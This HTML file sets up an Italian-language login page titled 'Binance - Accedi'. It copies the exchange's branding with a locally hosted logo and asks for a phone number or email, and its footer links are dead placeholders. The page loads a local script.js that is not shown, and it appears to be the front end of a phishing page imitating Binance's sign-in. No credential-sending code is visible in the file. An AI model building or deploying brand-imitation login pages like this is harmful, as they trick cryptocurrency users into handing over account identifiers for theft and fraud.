
<!DOCTYPE html>
<html lang="it">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Binance - Accedi</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="container">
        <div class="login-container">
            <div class="logo">
                <img src="./logo.png" alt="Binance" class="logo-image">
            </div>
            
            <h1 class="title">Accedi</h1>
            
            <form class="login-form">
                <div class="form-group">
                    <label for="phone" class="form-label">Numero di telefono</label>
                    <input 
                        type="tel" 
                        id="phone" 
                        class="form-input"
                        placeholder="Email/telefono (senza prefisso internazionale)"
                        pattern="[0-9]*"
                        inputmode="numeric"
                        maxlength="15"
                    >
                </div>
                
                <button type="submit" class="submit-button">
                    <span class="button-text">Successivo</span>
                    <div class="loading-animation" style="display: none;">
                        <div class="loading-bar"></div>
                        <div class="loading-bar"></div>
                        <div class="loading-bar"></div>
                        <div class="loading-bar"></div>
                        <div class="loading-bar"></div>
                    </div>
                </button>
            </form>
            
            <div class="divider">
                <span class="divider-text">o</span>
            </div>
            
            <div class="create-account">
                <a href="#" class="create-account-link">Crea un account Binance</a>
            </div>
        </div>
    </div>
    
    <footer class="footer">
        <div class="footer-content">
            <div class="footer-links">
                <span class="footer-language">
                    <svg class="globe-icon" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                        <circle cx="12" cy="12" r="10"/>
                        <line x1="2" y1="12" x2="22" y2="12"/>
                        <path d="M12 2a15.3 15.3 0 0 1 4 10 15.3 15.3 0 0 1-4 10 15.3 15.3 0 0 1-4-10 15.3 15.3 0 0 1 4-10z"/>
                    </svg>
                    Italiano
                </span>
                <a href="#" class="footer-link">Cookie</a>
                <a href="#" class="footer-link">Termini</a>
                <a href="#" class="footer-link">Privacy</a>
            </div>
        </div>
    </footer>
    
    <script src="script.js"></script>
</body>
</html>
